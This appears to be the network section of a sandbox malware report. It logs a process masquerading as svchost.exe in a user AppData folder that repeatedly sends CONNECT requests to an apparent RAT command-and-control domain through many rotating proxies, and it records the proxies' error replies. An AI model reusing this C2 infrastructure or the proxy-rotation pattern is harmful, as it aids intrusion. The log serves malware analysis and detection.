                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:31.971983910 CET318INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2741192.168.2.558348185.158.114.142569743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.650211096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2742192.168.2.558089117.160.250.134889943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.651828051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.336566925 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2743192.168.2.557603163.172.144.1321637943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.656887054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645860910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646497011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2744192.168.2.55809292.204.135.373252443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.659749985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974045038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2745192.168.2.556273107.180.88.1733577443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.660089970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.770544052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846472979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2746192.168.2.558302107.180.103.2146163443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.660449028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645890951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646514893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2747192.168.2.55891051.15.247.931637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.688932896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2748192.168.2.55889914.103.24.20800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.689007998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2749192.168.2.556292181.78.19.24799943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.690515041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.473684072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2750192.168.2.558892138.121.161.86819043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.690797091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.442529917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.443041086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.443012953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2751192.168.2.55812894.23.220.1365941543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.690798044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.442817926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2752192.168.2.55895293.190.142.573128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.691787958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.984617949 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2753192.168.2.558893221.6.139.190900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.695086956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.052977085 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2754192.168.2.558960188.166.17.18888143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.695882082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2755192.168.2.55617879.110.196.145808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.696208954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2756192.168.2.558896203.171.19.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.696770906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2757192.168.2.558977221.153.92.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.696919918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2758192.168.2.55897043.128.146.421567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.697591066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2759192.168.2.559118162.159.242.108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.697913885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.859299898 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2760192.168.2.5590623.90.100.12312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.698266983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.915535927 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2761192.168.2.559124104.27.122.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.698920012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.853281975 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2762192.168.2.55890851.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.698920965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2763192.168.2.55887289.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.699318886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2764192.168.2.559112104.16.108.1498043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.699807882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.854271889 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
